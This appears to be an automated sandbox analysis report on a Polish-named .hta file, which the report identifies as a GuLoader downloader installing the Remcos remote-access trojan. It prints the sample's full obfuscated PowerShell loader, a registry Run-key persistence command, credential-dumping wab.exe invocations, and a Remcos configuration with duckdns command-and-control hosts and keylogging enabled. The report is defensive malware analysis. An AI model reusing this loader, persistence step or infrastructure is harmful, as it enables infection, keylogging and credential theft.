Windows Analysis Report
PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta

Overview

General Information

Sample name: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta (renamed because original name is a hash value)
Original sample name: PLOCMR-002 Dane dotyczące dokumentów i towarów.hta
Analysis ID: 1435041
MD5: 86816f2832da46166cc3079c4c32a2d6
SHA1: a92657644d8dff7c7801eb465ca91e22767998b3
SHA256: 655f862dff56546606f574d6ca39a4f7dc0d3f5fc22d3f2e3cd3562e7c78a63e

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 3716 cmdline: mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 3748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . 
MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. 
mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. 
') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1892 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 2212 cmdline: same obfuscated command line as powershell.exe PID 3748 above MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2696 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 7252 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 7492 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wab.exe (PID: 4476 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7472 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7484 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 4164 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 3192 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7592 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7620 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • svchost.exe (PID: 1308 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 1772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Roaming\mvourhjs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

Source: 00000005.00000002.2590409597.0000000008570000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000005.00000002.2584352581.0000000005919000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000005.00000002.2590524362.0000000008E66000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security

               Source: amsi32_3748.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
              • 0xe0e1:$b2: ::FromBase64String(
              • 0xb470:$s1: -join
              • 0x4c1c:$s4: +=
              • 0x4cde:$s4: +=
              • 0x8f05:$s4: +=
              • 0xb022:$s4: +=
              • 0xb30c:$s4: +=
              • 0xb452:$s4: +=
              • 0xd6a8:$s4: +=
              • 0xd728:$s4: +=
              • 0xd7ee:$s4: +=
              • 0xd86e:$s4: +=
              • 0xda44:$s4: +=
              • 0xdac8:$s4: +=
              • 0xbb91:$e4: Get-WmiObject
              • 0xbd80:$e4: Get-Process
              • 0xbdd8:$e4: Start-Process
               Source: amsi32_2212.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
              • 0xe043:$b2: ::FromBase64String(
              • 0xb470:$s1: -join
              • 0x4c1c:$s4: +=
              • 0x4cde:$s4: +=
              • 0x8f05:$s4: +=
              • 0xb022:$s4: +=
              • 0xb30c:$s4: +=
              • 0xb452:$s4: +=
              • 0xd6a8:$s4: +=
              • 0xd728:$s4: +=
              • 0xd7ee:$s4: +=
              • 0xd86e:$s4: +=
              • 0xda44:$s4: +=
              • 0xdac8:$s4: +=
              • 0xbb91:$e4: Get-WmiObject
              • 0xbd80:$e4: Get-Process
              • 0xbdd8:$e4: Start-Process
              • 0x156fc:$e4: Get-Process

              System Summary

               Source: Process started, Author: Michael Haag, Data: Command: the obfuscated powershell.exe command line shown in the process tree above (cut off in the report)
               Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8024, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", ProcessId: 7252, ProcessName: cmd.exe
               Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: %Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Straddlers
               Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7252, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", ProcessId: 7492, ProcessName: reg.exe
               Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8024, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", ProcessId: 7252, ProcessName: cmd.exe
               Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems), Data: Details: %Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Straddlers
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (obfuscated script argument omitted)
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1308, ProcessName: svchost.exe
              No Snort rule has matched

              AV Detection

              Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
              Source: http://geoplugin.net/json.gp URL Reputation: Label: phishing
              Source: jgbours284hawara01.duckdns.org Avira URL Cloud: Label: malware
              Source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta ReversingLabs: Detection: 54%
              Source: Yara match File source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49727 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49734 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2590121491.000000000831A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2587009002.0000000007134000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: mshta.exe, 00000000.00000003.1998389233.0000000008651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1995220103.00000000085CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2587009002.0000000007146000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
